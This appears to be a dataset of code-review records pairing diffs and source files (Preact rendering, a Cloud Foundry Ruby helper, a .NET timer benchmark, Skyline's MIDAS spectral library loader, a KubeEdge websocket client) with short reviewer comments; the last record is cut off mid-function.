oldProps[name=='class' && newProps.className ? 'className' : name] = dom.attributes[i].value;
}
}
}
let oldHtml = oldProps.dangerouslySetInnerHTML;
let newHtml = newProps.dangerouslySetInnerHTML;
if (newHtml || oldHtml) {
// Avoid re-applying the same '__html' if it did not changed between re-render
if (!newHtml || !oldHtml || newHtml.__html!=oldHtml.__html) {
dom.innerHTML = newHtml && newHtml.__html || '';
}
}
if (newProps.multiple) {
dom.multiple = newProps.multiple;
}
diffChildren(dom, newVNode, oldVNode, context, newVNode.type==='foreignObject' ? false : isSvg, excessDomChildren, mounts, ancestorComponent);
diffProps(dom, newProps, oldProps, isSvg);
}
}
return dom;
}
/**
* Invoke or update a ref, depending on whether it is a function or object ref.
* @param {object|function} [ref=null]
* @param {any} [value]
*/
export function applyRef(ref, value, ancestorComponent) {
try {
if (typeof ref=='function') ref(value);
else ref.current = value;
}
catch (e) {
catchErrorInComponent(e, ancestorComponent);
}
}
/**
* Unmount a virtual node from the tree and apply DOM changes
* @param {import('../internal').VNode} vnode The virtual node to unmount
* @param {import('../internal').Component} ancestorComponent The parent
* component to this virtual node
* @param {boolean} skipRemove Flag that indicates that a parent node of the
* current element is already detached from the DOM.
*/
export function unmount(vnode, ancestorComponent, skipRemove) {
let r;
if (options.unmount) options.unmount(vnode);
if (r = vnode.ref) {
applyRef(r, null, ancestorComponent);
}
if (!skipRemove && vnode._lastDomChild==null && (skipRemove = ((r = vnode._dom)!=null))) removeNode(r);
vnode._dom = vnode._lastDomChild = null;
if ((r = vnode._component)!=null) {
if (r.componentWillUnmount) {
try {
r.componentWillUnmount();
}
catch (e) {
catchErrorInComponent(e, ancestorComponent);
}
}
r.base = r._parentDom = null;
if (r = r._prevVNode) unmount(r, ancestorComponent, skipRemove);
}
else if (r = vnode._children) {
for (let i = 0; i < r.length; i++) {
unmount(r[i], ancestorComponent, skipRemove);
}
}
}
/** The `.render()` method for a PFC backing instance. */
function doRender(props, state, context) {
return this.constructor(props, context);
}
/**
* Find the closest error boundary to a thrown error and call it
* @param {object} error The thrown value
* @param {import('../internal').Component} component The first ancestor
* component check for error boundary behaviors
*/
function catchErrorInComponent(error, component) {
for (; component; component = component._ancestorComponent) {
if (!component._processingException) {
try {
if (component.constructor.getDerivedStateFromError!=null) {
component.setState(component.constructor.getDerivedStateFromError(error));
}
else if (component.componentDidCatch!=null) {
component.componentDidCatch(error);
}
else {
continue;
}
return enqueueRender(component._processingException = component);
}
catch (e) {
error = e;
}
}
}
throw error;
}
| 1 | 12,900 | Nit: Change is not needed for this PR :slightly_smiling_face: | preactjs-preact | js |
@@ -11,6 +11,15 @@ module CloudFoundry
end
end
+ def self.app_url
+ if self.is_environment?
+ # (arbitrarily) use the shortest assigned route, if there are multiple
+ self.vcap_data['application_uris'].min_by(&:length)
+ else
+ nil
+ end
+ end
+
# returns `true` if this app is running in Cloud Foundry
def self.is_environment?
!!self.raw_vcap_data | 1 | module CloudFoundry
def self.raw_vcap_data
ENV['VCAP_APPLICATION']
end
def self.vcap_data
if self.is_environment?
JSON.parse(self.raw_vcap_data)
else
nil
end
end
# returns `true` if this app is running in Cloud Foundry
def self.is_environment?
!!self.raw_vcap_data
end
def self.instance_index
if self.is_environment?
self.vcap_data['instance_index']
else
nil
end
end
end
| 1 | 14,492 | if we are returning `nil` from an `else` I think we can just remove the `else` (and this method will still return `nil`) | 18F-C2 | rb |
@@ -9,7 +9,7 @@ using System.Threading.Tasks;
namespace System.Threading.Tests
{
[BenchmarkCategory(Categories.CoreFX)]
- public class TimerPerfTest
+ public class Perf_Timer
{
private readonly Timer[] _timers = new Timer[1_000_000];
private readonly Task[] _tasks = new Task[Environment.ProcessorCount]; | 1 | // Licensed to the .NET Foundation under one or more agreements.
// The .NET Foundation licenses this file to you under the MIT license.
// See the LICENSE file in the project root for more information.
using BenchmarkDotNet.Attributes;
using MicroBenchmarks;
using System.Threading.Tasks;
namespace System.Threading.Tests
{
[BenchmarkCategory(Categories.CoreFX)]
public class TimerPerfTest
{
private readonly Timer[] _timers = new Timer[1_000_000];
private readonly Task[] _tasks = new Task[Environment.ProcessorCount];
[Benchmark]
public void ShortScheduleAndDispose() => new Timer(_ => { }, null, 50, -1).Dispose();
[Benchmark]
public void LongScheduleAndDispose() => new Timer(_ => { }, null, int.MaxValue, -1).Dispose();
[Benchmark]
public void ScheduleManyThenDisposeMany()
{
Timer[] timers = _timers;
for (int i = 0; i < timers.Length; i++)
{
timers[i] = new Timer(_ => { }, null, int.MaxValue, -1);
}
foreach (Timer timer in timers)
{
timer.Dispose();
}
}
[Benchmark]
public void SynchronousContention()
{
Task[] tasks = _tasks;
for (int i = 0; i < tasks.Length; i++)
{
tasks[i] = Task.Run(() =>
{
for (int j = 0; j < 1_000_000; j++)
{
new Timer(delegate { }, null, int.MaxValue, -1).Dispose();
}
});
}
Task.WaitAll(tasks);
}
[Benchmark]
public void AsynchronousContention()
{
Task[] tasks = _tasks;
for (int i = 0; i < tasks.Length; i++)
{
tasks[i] = Task.Run(async () =>
{
for (int j = 0; j < 1_000_000; j++)
{
using (var t = new Timer(delegate { }, null, int.MaxValue, -1))
{
await Task.Yield();
}
}
});
}
Task.WaitAll(tasks);
}
}
}
| 1 | 7,727 | side note: this change is ok as of today because we have not exported the results for this new type to BenchView yet. After we to that the namespace, type name and method name should not be changed (they create a benchmark ID which is used in BenchView). | dotnet-performance | .cs |
@@ -294,7 +294,15 @@ namespace pwiz.Skyline.Model.Lib.Midas
_spectra = null;
if (FilePath == null)
return false;
- var info = new FileInfo(FilePath);
+ FileInfo info;
+ try
+ {
+ info = new FileInfo(FilePath);
+ }
+ catch
+ {
+ return false;
+ }
if (!info.Exists || info.Length == 0)
return false;
| 1 | /*
* Original author: Kaipo Tamura <kaipot .at. u.washington.edu>,
* MacCoss Lab, Department of Genome Sciences, UW
*
* Copyright 2016 University of Washington - Seattle, WA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Threading;
using System.Xml;
using System.Xml.Serialization;
using pwiz.Common.Collections;
using pwiz.Common.Database.NHibernate;
using pwiz.Common.SystemUtil;
using pwiz.ProteowizardWrapper;
using pwiz.Skyline.Model.DocSettings;
using pwiz.Skyline.Model.Results;
using pwiz.Skyline.Model.RetentionTimes;
using pwiz.Skyline.Properties;
using pwiz.Skyline.Util;
namespace pwiz.Skyline.Model.Lib.Midas
{
[XmlRoot("midas_library")]
public class MidasLibrary : Library
{
private const int SCHEMA_VERSION_CURRENT = 1;
private const double PRECURSOR_TOLERANCE_CHROM = 0.7;
private const double PRECURSOR_TOLERANCE = 0.001;
private const double RT_TOLERANCE = 0.001;
private int SchemaVersion { get; set; }
private string LibraryGuid { get; set; }
private Dictionary<DbResultsFile, List<DbSpectrum>> _spectra;
/// <summary>
/// A monotonically increasing revision number associated with this library.
/// </summary>
private float Revision { get; set; }
/// <summary>
/// Path to the file on disk from which this library was loaded. This value
/// may be null, if the library was deserialized from XML and has not yet
/// been loaded.
/// </summary>
public string FilePath { get; private set; }
public static MidasLibrary Load(MidasLibSpec spec, ILoadMonitor monitor)
{
var library = new MidasLibrary(spec);
return library.Load(monitor) ? library : null;
}
/// <summary>
/// Controlled access to this <see cref="Immutable"/> class, which should be
/// created through <see cref="Load(MidasLibSpec, ILoadMonitor)"/>.
/// </summary>
private MidasLibrary(LibrarySpec spec)
: base(spec)
{
FilePath = spec.FilePath;
}
protected override LibrarySpec CreateSpec()
{
return new MidasLibSpec(Name, FilePath);
}
public override string SpecFilter
{
get { return MidasLibSpec.FILTER_MIDAS; }
}
public override IList<RetentionTimeSource> ListRetentionTimeSources()
{
return new RetentionTimeSource[0];
//return _spectra.Where(kvp => kvp.Value.Any()).Select(kvp => new RetentionTimeSource(kvp.Key.BaseName, Name)).ToArray();
}
public override LibraryDetails LibraryDetails
{
get
{
return new LibraryDetails
{
Format = @"MIDAS",
Revision = Revision.ToString(LocalizationHelper.CurrentCulture),
SpectrumCount = 0,
DataFiles = LibraryFiles.FilePaths.Select(f => new SpectrumSourceFileDetails(f)).ToList()
};
}
}
public override LibraryFiles LibraryFiles
{
get
{
if (_spectra == null)
{
return new LibraryFiles();
}
else
{
return new LibraryFiles
{
FilePaths = _spectra.Keys.Select(key => key.FilePath).Distinct()
};
}
}
}
public override IPooledStream ReadStream { get { return null; } }
public override IEnumerable<IPooledStream> ReadStreams { get { yield break; }}
public override string IsNotLoadedExplained
{
get { return _spectra != null ? null : @"MIDAS: no dictionary"; }
}
public override bool IsSameLibrary(Library library)
{
var midasLib = library as MidasLibrary;
return midasLib != null && Equals(LibraryGuid, midasLib.LibraryGuid);
}
public override int CompareRevisions(Library library)
{
// Not a valid request, if the two libraries are not the same.
Debug.Assert(IsSameLibrary(library));
return Revision.CompareTo(((MidasLibrary) library).Revision);
}
public static string[] GetMissingFiles(SrmDocument document, IEnumerable<Library> libraries)
{
var results = document.Settings.MeasuredResults;
if (results == null)
return new string[0];
var midasFiles = results.MSDataFileInfos.Where(file => file.HasMidasSpectra).Select(file => file.FilePath.GetFilePath()).Distinct();
var libFiles = document.Settings.PeptideSettings.Libraries.MidasLibraries.SelectMany(lib => lib.ResultsFiles).Select(Path.GetFileName);
foreach (var lib in libraries.Where(lib => lib != null))
libFiles = libFiles.Concat(lib.LibraryFiles.FilePaths);
return midasFiles.Where(f => !libFiles.Contains(Path.GetFileName(f))).ToArray();
}
public static IEnumerable<ChromatogramSet> UnflagFiles(IEnumerable<ChromatogramSet> chromatograms, IEnumerable<string> filenames)
{
var arrFiles = new HashSet<string>(filenames);
if (!arrFiles.Any())
{
foreach (var chromSet in chromatograms)
yield return chromSet;
yield break;
}
foreach (var chromSet in chromatograms)
{
var infos = new List<ChromFileInfo>();
foreach (var info in chromSet.MSDataFileInfos)
{
var infoToAdd = info.HasMidasSpectra && arrFiles.Contains(info.FilePath.GetFileName())
? info.ChangeHasMidasSpectra(false)
: info;
infos.Add(infoToAdd);
}
yield return !ArrayUtil.ReferencesEqual(chromSet.MSDataFileInfos, infos)
? chromSet.ChangeMSDataFileInfos(infos)
: chromSet;
}
}
private static IEnumerable<double> ReadChromPrecursorsFromMsd(MsDataFileImpl msd, IProgressMonitor monitor)
{
for (var i = 0; i < msd.ChromatogramCount; i++)
{
if (monitor.IsCanceled)
yield break;
double? precursor = null;
try
{
int tmp;
var chromKey = ChromKey.FromId(msd.GetChromatogramId(i, out tmp), false);
precursor = chromKey.Precursor;
}
catch
{
// ignored
}
if (precursor.HasValue)
yield return precursor.Value;
}
}
private static IEnumerable<DbSpectrum> ReadDbSpectraFromMsd(MsDataFileImpl msd, IProgressMonitor monitor)
{
for (var i = 0; i < msd.SpectrumCount; i++)
{
if (monitor.IsCanceled)
yield break;
var spectrum = msd.GetSpectrum(i);
var ms1Precursors = spectrum.GetPrecursorsByMsLevel(1);
if (!ms1Precursors.Any())
continue;
var precursor = ms1Precursors.First();
yield return new DbSpectrum(new DbResultsFile(msd.FilePath), precursor.PrecursorMz.GetValueOrDefault(),
null, null, null, spectrum.RetentionTime.GetValueOrDefault(), spectrum.Mzs, spectrum.Intensities);
}
}
private static void MatchSpectraToChrom(List<DbSpectrum> dbSpectra, List<double> chromPrecursors, IProgressMonitor monitor)
{
chromPrecursors = chromPrecursors.Distinct().ToList();
chromPrecursors.Sort();
dbSpectra.Sort((x, y) => x.PrecursorMz.CompareTo(y.PrecursorMz));
for (int i = 0, j = 0; i < dbSpectra.Count; )
{
if (monitor.IsCanceled)
return;
var specPrecursor = dbSpectra[i].PrecursorMz;
var chromPrecursor = chromPrecursors[j];
var curDiff = Math.Abs(specPrecursor - chromPrecursor);
var nextDiff = chromPrecursors.Count > j + 1 ? Math.Abs(specPrecursor - chromPrecursors[j + 1]) : double.MaxValue;
if (curDiff < nextDiff)
{
if (curDiff <= PRECURSOR_TOLERANCE_CHROM)
dbSpectra[i].MatchedPrecursorMz = chromPrecursor;
i++;
}
else
{
j++;
}
}
}
private static void MatchSpectraToPeptides(IEnumerable<DbSpectrum> dbSpectra, SrmDocument doc, IProgressMonitor monitor)
{
var precursors = (from nodePepGroup in doc.PeptideGroups
from nodePep in nodePepGroup.Peptides
from nodeTranGroup in nodePep.TransitionGroups
select new Tuple<double, Target, int>(
nodeTranGroup.PrecursorMz,
doc.Settings.GetPrecursorCalc(nodeTranGroup.TransitionGroup.LabelType, nodePep.ExplicitMods).GetModifiedSequence(nodePep.Peptide.Target, false),
nodeTranGroup.PrecursorCharge
)).ToList();
if (!precursors.Any())
return;
precursors.Sort((x, y) => x.Item1.CompareTo(y.Item1));
foreach (var spectrum in dbSpectra)
{
if (spectrum == null || !spectrum.HasPrecursorMatch)
continue;
var precursor = spectrum.MatchedPrecursorMz.Value;
var j = CollectionUtil.BinarySearch(precursors, tuple => tuple.Item1.CompareTo(precursor), true);
if (j < 0)
{
j = ~j;
if (j == precursors.Count || (j > 0 && precursors[j].Item1 - precursor > precursor - precursors[j-1].Item1))
{
j--;
}
}
var closest = precursors[j];
if (Math.Abs(precursor - closest.Item1) < PRECURSOR_TOLERANCE)
{
spectrum.DocumentPeptide = closest.Item2.Sequence;
spectrum.DocumentPrecursorCharge = closest.Item3;
}
}
}
private bool Load(IProgressMonitor monitor)
{
_spectra = null;
if (FilePath == null)
return false;
var info = new FileInfo(FilePath);
if (!info.Exists || info.Length == 0)
return false;
var progress = new ProgressStatus(string.Empty).ChangeMessage(Resources.MidasLibrary_Load_Loading_MIDAS_library);
monitor.UpdateProgress(progress);
var spectra = new Dictionary<DbResultsFile, List<DbSpectrum>>();
try
{
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(FilePath, typeof(MidasLibrary), false))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), false))
{
var libInfo = session.CreateCriteria(typeof(DbLibInfo)).List<DbLibInfo>();
if (libInfo.Count != 1)
throw new Exception(Resources.MidasLibrary_Load_Error_reading_LibInfo_from_MIDAS_library);
SchemaVersion = libInfo[0].SchemaVersion;
LibraryGuid = libInfo[0].Guid;
var readSpectra = session.CreateCriteria(typeof(DbSpectrum)).List<DbSpectrum>();
progress = progress.ChangeSegments(0, readSpectra.Count);
foreach (var spectrum in readSpectra)
{
if (monitor.IsCanceled)
{
monitor.UpdateProgress(progress.Cancel());
return false;
}
progress = progress.NextSegment();
monitor.UpdateProgress(progress);
List<DbSpectrum> list;
if (!spectra.TryGetValue(spectrum.ResultsFile, out list))
{
list = new List<DbSpectrum>();
spectra[spectrum.ResultsFile] = list;
}
list.Add(spectrum);
}
}
}
catch
{
monitor.UpdateProgress(progress.Cancel());
return false;
}
_spectra = spectra;
monitor.UpdateProgress(progress.Complete());
return true;
}
public IEnumerable<DbSpectrum> GetSpectraByFile(MsDataFileUri file)
{
return IsLoaded
? _spectra.Where(kvp => file == null || Equals(kvp.Key.FileName, file.GetFileName())).SelectMany(kvp => kvp.Value)
: new DbSpectrum[0];
}
public IEnumerable<DbSpectrum> GetSpectraByPrecursor(MsDataFileUri file, double precursor)
{
return GetSpectraByFile(file).Where(spectrum =>
spectrum.HasPrecursorMatch && Math.Abs(spectrum.MatchedPrecursorMz.GetValueOrDefault() - precursor) <= PRECURSOR_TOLERANCE);
}
public IEnumerable<DbSpectrum> GetSpectraByRetentionTime(MsDataFileUri file, double precursor, double rtMin, double rtMax)
{
var min = rtMin - RT_TOLERANCE;
var max = rtMax + RT_TOLERANCE;
return GetSpectraByPrecursor(file, precursor).Where(spectrum =>
min <= spectrum.RetentionTime && spectrum.RetentionTime <= max);
}
public IEnumerable<DbSpectrum> GetSpectraByPeptide(MsDataFileUri file, LibKey libKey)
{
foreach (var spectrum in GetSpectraByFile(file))
{
if (string.IsNullOrWhiteSpace(spectrum.DocumentPeptide))
{
continue;
}
var key = new PeptideLibraryKey(spectrum.DocumentPeptide,
spectrum.DocumentPrecursorCharge.GetValueOrDefault());
if (LibKeyIndex.KeysMatch(libKey.LibraryKey, key))
{
yield return spectrum;
}
}
}
public override bool Contains(LibKey key)
{
if (!key.IsPrecursorKey)
return GetSpectraByPeptide(null, key).Any();
var spectra = GetSpectraByPrecursor(null, key.PrecursorMz.GetValueOrDefault());
var keyRt = key.RetentionTime;
return !keyRt.HasValue ? spectra.Any() : spectra.Any(s => Equals(keyRt.Value, s.RetentionTime));
}
public override bool ContainsAny(Target target)
{
var key = new PeptideLibraryKey(target.Sequence, 0);
return _spectra.SelectMany(fileSpectra => fileSpectra.Value)
.Any(spectrum => null != spectrum.DocumentPeptide && key.UnmodifiedSequence ==
new PeptideLibraryKey(spectrum.DocumentPeptide, 0).UnmodifiedSequence);
}
public override bool TryGetLibInfo(LibKey key, out SpectrumHeaderInfo libInfo)
{
libInfo = Contains(key) ? new BiblioSpecSpectrumHeaderInfo(Name, 1, null, null) : null;
return libInfo != null;
}
public override bool TryLoadSpectrum(LibKey key, out SpectrumPeaksInfo spectrum)
{
spectrum = null;
DbSpectrum[] spectra;
if (!key.IsPrecursorKey)
{
spectra = GetSpectraByPeptide(null, key).ToArray();
}
else
{
spectra = GetSpectraByPrecursor(null, key.PrecursorMz.GetValueOrDefault()).ToArray();
var keyRt = key.RetentionTime;
if (keyRt.HasValue)
spectra = spectra.Where(s => Equals(keyRt.Value, s.RetentionTime)).ToArray();
}
if (!spectra.Any())
return false;
var spec = spectra.First();
var mi = spec.Mzs.Select((t, i) => new SpectrumPeaksInfo.MI { Mz = spec.Mzs[i], Intensity = (float)spec.Intensities[i] }); // CONSIDER(bspratt): annotation?
spectrum = new SpectrumPeaksInfo(mi.ToArray());
return true;
}
public override SpectrumPeaksInfo LoadSpectrum(object spectrumKey)
{
var spec = spectrumKey as DbSpectrum;
if (spec == null)
return null;
var mi = spec.Mzs.Select((t, i) => new SpectrumPeaksInfo.MI { Mz = spec.Mzs[i], Intensity = (float)spec.Intensities[i] }); // CONSIDER(bspratt): annotation?
return new SpectrumPeaksInfo(mi.ToArray());
}
public override bool TryGetRetentionTimes(LibKey key, MsDataFileUri filePath, out double[] retentionTimes)
{
retentionTimes = null;
DbSpectrum[] spectra;
if (!key.IsPrecursorKey)
{
spectra = GetSpectraByPeptide(filePath, key).ToArray();
}
else
{
spectra = GetSpectraByPrecursor(filePath, key.PrecursorMz.GetValueOrDefault()).ToArray();
var keyRt = key.RetentionTime;
if (keyRt.HasValue)
spectra = spectra.Where(s => Equals(keyRt.Value, s.RetentionTime)).ToArray();
}
if (!spectra.Any())
return false;
retentionTimes = spectra.Select(s => s.RetentionTime).ToArray();
return true;
}
public override bool TryGetRetentionTimes(MsDataFileUri filePath, out LibraryRetentionTimes retentionTimes)
{
retentionTimes = null;
return false;
}
public override bool TryGetRetentionTimes(int fileIndex, out LibraryRetentionTimes retentionTimes)
{
retentionTimes = null;
return false;
}
public override bool TryGetIrts(out LibraryRetentionTimes retentionTimes)
{
retentionTimes = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey key, MsDataFileUri filePath, out IonMobilityAndCCS[] ionMobilities)
{
ionMobilities = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey[] targetIons, MsDataFileUri filePath, out LibraryIonMobilityInfo ionMobilities)
{
ionMobilities = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey[] targetIons, int fileIndex, out LibraryIonMobilityInfo ionMobilities)
{
ionMobilities = null;
return false;
}
public override bool TryGetIonMobilityInfos(LibKey[] targetIons, out LibraryIonMobilityInfo ionMobilities)
{
ionMobilities = null;
return false;
}
public override IEnumerable<SpectrumInfoLibrary> GetSpectra(LibKey key, IsotopeLabelType labelType, LibraryRedundancy redundancy)
{
if (redundancy == LibraryRedundancy.best)
yield break;
if (!key.IsPrecursorKey)
{
foreach (var spectrum in GetSpectraByPeptide(null, key))
yield return new SpectrumInfoLibrary(this, labelType, spectrum.ResultsFile.FilePath, spectrum.RetentionTime, null, false, spectrum);
yield break;
}
var keyRt = key.RetentionTime;
foreach (var spectrum in GetSpectraByPrecursor(null, key.PrecursorMz.GetValueOrDefault()))
if (!keyRt.HasValue || Equals(keyRt.Value, spectrum.RetentionTime))
yield return new SpectrumInfoLibrary(this, labelType, spectrum.ResultsFile.FilePath, spectrum.RetentionTime, null, false, spectrum);
}
public override int? FileCount { get { return IsLoaded ? _spectra.Keys.Count : 0; } }
public override int SpectrumCount { get { return IsLoaded ? _spectra.Sum(s => s.Value.Count(s2 => s2.HasPrecursorMatch)) : 0; } }
public override IEnumerable<LibKey> Keys
{
get
{
if (!IsLoaded)
yield break;
foreach (var spectrum in _spectra.Values.SelectMany(s => s).Where(s => s.HasPrecursorMatch))
yield return new LibKey(spectrum.MatchedPrecursorMz.GetValueOrDefault(), spectrum.RetentionTime);
}
}
public IEnumerable<string> ResultsFiles
{
get
{
if (_spectra == null)
yield break;
foreach (var key in _spectra.Keys)
yield return key.FilePath;
}
}
#region Implementation of IXmlSerializable
/// <summary>
/// For serialization
/// </summary>
private MidasLibrary()
{
}
private enum ATTR
{
// lsid, old version has no unique identifier
revision
}
public static MidasLibrary Deserialize(XmlReader reader)
{
return reader.Deserialize(new MidasLibrary());
}
public override void ReadXml(XmlReader reader)
{
// Read tag attributes
base.ReadXml(reader);
Revision = reader.GetFloatAttribute(ATTR.revision, 0);
// Consume tag
reader.Read();
}
public override void WriteXml(XmlWriter writer)
{
// Write tag attributes
base.WriteXml(writer);
writer.WriteAttribute(ATTR.revision, Revision);
}
#endregion
#region object overrides
public bool Equals(MidasLibrary obj)
{
if (ReferenceEquals(null, obj)) return false;
if (ReferenceEquals(this, obj)) return true;
return base.Equals(obj) && obj.Revision == Revision && Equals(obj.FilePath, FilePath);
}
public override bool Equals(object obj)
{
return !ReferenceEquals(null, obj) && (ReferenceEquals(this, obj) || Equals(obj as MidasLibrary));
}
public override int GetHashCode()
{
unchecked
{
var result = base.GetHashCode();
result = (result*397) ^ Revision.GetHashCode();
result = (result*397) ^ (FilePath != null ? FilePath.GetHashCode() : 0);
return result;
}
}
#endregion
public static MidasLibrary Create(LibrarySpec libSpec)
{
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(libSpec.FilePath, typeof(MidasLibrary), true))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), true))
using (var transaction = session.BeginTransaction())
{
session.Save(new DbLibInfo {SchemaVersion = SCHEMA_VERSION_CURRENT, Guid = Guid.NewGuid().ToString()});
transaction.Commit();
return new MidasLibrary(libSpec);
}
}
public static void AddSpectra(MidasLibSpec libSpec, MsDataFilePath[] resultsFiles, SrmDocument doc, ILoadMonitor monitor, out List<MsDataFilePath> failedFiles)
{
// Get spectra from results files
var newSpectra = new List<DbSpectrum>();
var progress = new ProgressStatus(string.Empty).ChangeMessage(Resources.MidasLibrary_AddSpectra_Reading_MIDAS_spectra);
const int percentResultsFiles = 80;
failedFiles = new List<MsDataFilePath>();
for (var i = 0; i < resultsFiles.Length; i++)
{
var resultsFile = resultsFiles[i];
try
{
monitor.UpdateProgress(progress.ChangePercentComplete(i*percentResultsFiles/resultsFiles.Length));
var filePath = resultsFile.GetFilePath();
if (File.Exists(filePath))
{
var sampleIndex = resultsFile.GetSampleIndex();
using (var msd = new MsDataFileImpl(filePath, sampleIndex == -1 ? 0 : sampleIndex, resultsFile.GetLockMassParameters(), requireVendorCentroidedMS2: true))
{
if (ChromatogramDataProvider.HasChromatogramData(msd) && SpectraChromDataProvider.HasSpectrumData(msd))
{
var chromPrecursors = ReadChromPrecursorsFromMsd(msd, monitor).ToList();
newSpectra.AddRange(ReadDbSpectraFromMsd(msd, monitor));
MatchSpectraToChrom(newSpectra, chromPrecursors, monitor);
}
}
MatchSpectraToPeptides(newSpectra, doc, monitor);
}
else
{
failedFiles.Add(resultsFile);
}
}
catch (Exception x)
{
monitor.UpdateProgress(progress.ChangeErrorException(x));
failedFiles.Add(resultsFile);
}
if (monitor.IsCanceled)
{
monitor.UpdateProgress(progress.Cancel());
return;
}
}
if (!newSpectra.Any())
{
monitor.UpdateProgress(progress.Complete());
return;
}
progress = progress.ChangePercentComplete(percentResultsFiles);
monitor.UpdateProgress(progress);
// Add spectra to library
var midasLib = !File.Exists(libSpec.FilePath) ? Create(libSpec) : Load(libSpec, monitor);
if (midasLib == null)
{
monitor.UpdateProgress(progress.ChangeErrorException(new Exception(Resources.MidasLibrary_AddSpectra_Error_loading_MIDAS_library_for_adding_spectra_)));
return;
}
progress = progress.ChangeMessage(Resources.MidasLibrary_AddSpectra_Adding_spectra_to_MIDAS_library);
monitor.UpdateProgress(progress);
var results = new Dictionary<string, DbResultsFile>();
if (midasLib._spectra != null)
{
foreach (var kvp in midasLib._spectra)
results[kvp.Key.FilePath] = kvp.Key;
}
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(libSpec.FilePath, typeof(MidasLibrary), false))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), true))
using (var transaction = session.BeginTransaction())
{
for (var i = 0; i < newSpectra.Count; i++)
{
if (monitor.IsCanceled)
{
transaction.Rollback();
monitor.UpdateProgress(progress.Cancel());
return;
}
var spectrum = newSpectra[i];
monitor.UpdateProgress(progress.ChangePercentComplete(percentResultsFiles + (int) (100.0*i/newSpectra.Count)));
DbResultsFile resultsFile;
if (!results.TryGetValue(spectrum.ResultsFile.FilePath, out resultsFile))
{
resultsFile = new DbResultsFile(spectrum.ResultsFile) { Id = null };
results[spectrum.ResultsFile.FilePath] = resultsFile;
session.SaveOrUpdate(resultsFile);
}
else if (midasLib._spectra != null)
{
List<DbSpectrum> existingSpectra;
if (midasLib._spectra.TryGetValue(resultsFile, out existingSpectra) &&
existingSpectra.Any(x => Equals(x.ResultsFile.FilePath, spectrum.ResultsFile.FilePath) &&
Equals(x.PrecursorMz, spectrum.PrecursorMz) &&
Equals(x.RetentionTime, spectrum.RetentionTime)))
{
// This spectrum already exists in the library
continue;
}
}
var spectrumNewDisconnected = new DbSpectrum(spectrum) {Id = null, ResultsFile = resultsFile};
session.SaveOrUpdate(spectrumNewDisconnected);
}
transaction.Commit();
monitor.UpdateProgress(progress.Complete());
}
}
public void RemoveResultsFiles(params string[] resultsFiles)
{
using (var sessionFactory = SessionFactoryFactory.CreateSessionFactory(FilePath, typeof(MidasLibrary), false))
using (var session = new SessionWithLock(sessionFactory.OpenSession(), new ReaderWriterLock(), true))
using (var transaction = session.BeginTransaction())
{
foreach (var kvp in _spectra)
{
if (resultsFiles.Contains(kvp.Key.FilePath))
{
foreach (var spectrum in kvp.Value)
session.Delete(spectrum);
session.Delete(kvp.Key);
}
}
transaction.Commit();
}
}
}
}
| 1 | 12,885 | How exactly are you expecting the user to see issues with their Midas library? It seems like all error information is being swallowed and not clearly reported to the user. Even if the eventual result is to report that loading the file failed, it seems like the exception, in this case, might have more information about why. | ProteoWizard-pwiz | .cs |
@@ -105,6 +105,10 @@ func (wsc *WebSocketClient) UnInit() {
//Send sends the message as JSON object through the connection
func (wsc *WebSocketClient) Send(message model.Message) error {
+ err := wsc.connection.SetWriteDeadline(time.Now().Add(wsc.config.WriteDeadline))
+ if err != nil {
+ return err
+ }
return wsc.connection.WriteMessageAsync(&message)
}
| 1 | package wsclient
import (
"crypto/tls"
"crypto/x509"
"errors"
"fmt"
"io/ioutil"
"net/http"
"time"
"k8s.io/klog/v2"
"github.com/kubeedge/beehive/pkg/core/model"
"github.com/kubeedge/kubeedge/edge/pkg/edgehub/config"
"github.com/kubeedge/viaduct/pkg/api"
wsclient "github.com/kubeedge/viaduct/pkg/client"
"github.com/kubeedge/viaduct/pkg/conn"
)
const (
retryCount = 5
cloudAccessSleep = 5 * time.Second
)
// WebSocketClient a websocket client
type WebSocketClient struct {
config *WebSocketConfig
connection conn.Connection
}
// WebSocketConfig config for websocket
type WebSocketConfig struct {
URL string
CertFilePath string
KeyFilePath string
HandshakeTimeout time.Duration
ReadDeadline time.Duration
WriteDeadline time.Duration
NodeID string
ProjectID string
}
// NewWebSocketClient initializes a new websocket client instance
func NewWebSocketClient(conf *WebSocketConfig) *WebSocketClient {
return &WebSocketClient{config: conf}
}
// Init initializes websocket client
func (wsc *WebSocketClient) Init() error {
klog.Infof("Websocket start to connect Access")
cert, err := tls.LoadX509KeyPair(wsc.config.CertFilePath, wsc.config.KeyFilePath)
if err != nil {
klog.Errorf("Failed to load x509 key pair: %v", err)
return fmt.Errorf("failed to load x509 key pair, error: %v", err)
}
caCert, err := ioutil.ReadFile(config.Config.TLSCAFile)
if err != nil {
return err
}
pool := x509.NewCertPool()
if ok := pool.AppendCertsFromPEM(caCert); !ok {
return fmt.Errorf("cannot parse the certificates")
}
tlsConfig := &tls.Config{
RootCAs: pool,
Certificates: []tls.Certificate{cert},
InsecureSkipVerify: false,
}
option := wsclient.Options{
HandshakeTimeout: wsc.config.HandshakeTimeout,
TLSConfig: tlsConfig,
Type: api.ProtocolTypeWS,
Addr: wsc.config.URL,
AutoRoute: false,
ConnUse: api.UseTypeMessage,
}
exOpts := api.WSClientOption{Header: make(http.Header)}
exOpts.Header.Set("node_id", wsc.config.NodeID)
exOpts.Header.Set("project_id", wsc.config.ProjectID)
client := &wsclient.Client{Options: option, ExOpts: exOpts}
for i := 0; i < retryCount; i++ {
connection, err := client.Connect()
if err != nil {
klog.Errorf("Init websocket connection failed %s", err.Error())
} else {
wsc.connection = connection
